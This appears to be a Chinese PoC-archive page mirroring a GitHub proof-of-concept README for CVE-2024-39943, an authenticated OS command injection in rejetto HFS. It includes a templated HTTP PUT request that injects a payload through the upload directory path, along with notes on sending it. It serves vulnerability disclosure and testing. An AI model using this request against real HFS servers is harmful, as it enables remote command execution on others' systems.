POC详情: 380a2007d836f67ad5b258d281963d3990c94ccf

来源
https://github.com/truonghuuphuc/CVE-2024-39943-Poc
关联漏洞
标题: rejetto HFS 安全漏洞 (CVE-2024-39943)
描述:rejetto HFS是意大利Massimo Melina个人开发者的一款基于Web的文件服务器。 rejetto HFS 0.52.10之前版本存在安全漏洞,该漏洞源于允许经过身份验证的远程用户执行操作系统命令。
描述
CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).
介绍
# CVE-2024-39943-Poc
CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

Deploy: ``` ./hfs --config config.yaml ```


## Poc: user admin
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/c9e3d7ec-9181-43b5-8230-82c36fbf8a2b

## Poc: user guest
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/cbb55ece-2c68-4ade-a09d-8b9bf3b961d8

## update 6/7/2024: Poc user guest
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/f5e0c190-419a-4017-83ab-8a303b7176a8

<!--Note:
Payload is directory name exist , If the directory does not exist, you need to send the request twice. In the video, because a directory with the name contain payload already exists on the HFS server, I only need to send the request once

https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/8bc8c270-24a5-4ad6-b32b-a75243afcd6a
-->
```
PUT /tmp/{{payload}}/poc11.txt HTTP/1.1
Host: <host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: {{Cookie}}
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

aaaaaaaaaaa
```
文件快照

 [4.0K]  /data/pocs/380a2007d836f67ad5b258d281963d3990c94ccf
├── [ 199]  config.yaml
├── [ 23M]  hfs-linux.zip
├── [1.0K]  poc_user_admin.py
├── [ 705]  poc_user_guest.py
└── [1.5K]  README.md

0 directories, 5 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。